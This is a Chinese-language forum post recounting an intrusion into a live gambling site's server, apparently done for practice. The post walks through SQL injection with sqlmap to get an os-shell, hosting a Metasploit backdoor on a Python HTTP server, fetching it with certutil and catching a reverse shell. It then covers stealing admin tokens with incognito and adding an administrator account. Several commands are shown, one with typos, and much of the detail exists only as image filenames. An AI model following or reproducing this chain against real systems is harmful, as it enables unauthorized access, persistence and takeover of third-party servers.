標題:對非法網站的一次提權

taibeihacker

Moderator

0x01 收集信息​

因為主要想練習sql注入,所以信息收集做的比較簡單:
通過fofa找到相關cms,這裡發現棋牌後台登錄處存在SQL注入漏洞
1049983-20220106103848636-924492451.png

0x02 漏洞利用​

1.利用sqlmap一把梭,並獲取os-shell
1049983-20220106103850462-796781300.png

2.利用python搭建一個簡單的http服務器,並掛載MSF生成的後門文件
python -m SimpleHTTPServer
1049983-20220106103851323-1030757479.png

3.os-shell下遠程下載後門執行程序
在os-shell下通過命令創建一個目錄
mkdir C:\test
在os-shell下通過certutil命令遠程下載後門文件到服務器上
1049983-20220106103851746-367273951.jpg
1049983-20220106103852218-758504582.jpg
4.執行msf反彈shell
use exploit/mulit/hander
set lhost 接收反彈shell的ip
run
1049983-20220106103852625-1098906251.jpg
1049983-20220106103853010-983725142.jpg

5.成功進入該服務器
這時發現我們只有gust權限難受
6.對目標服務器進行提權
提權方法:內核提權以及竊取管理tokens提權
本文只利用竊取管理tokens提權
使用use incognito來加載會話令牌模塊
然後list_tokens -u來列出會話令牌
1049983-20220106103853526-792774397.png

7.創建用戶
命令:net user 用戶名密碼/add
1049983-20220106103854204-918244820.png

1049983-20220106103854793-904428810.png

0x03 渗透总结​

1.通過SQLmap獲取os-shell2.在msf下生產後門文件3.通過python -m SimpleHTTPServer 搭建http服務器,並將生成的後門文件拷貝到到http服務器目錄下。 2.在os-shell模式下創建目錄,並通過certutil遠程下載http服務器上的後門。 4.通過MSF反彈shell。在MSF下添加用戶以及添加到管理員組,可遠程桌面登錄
 
返回
上方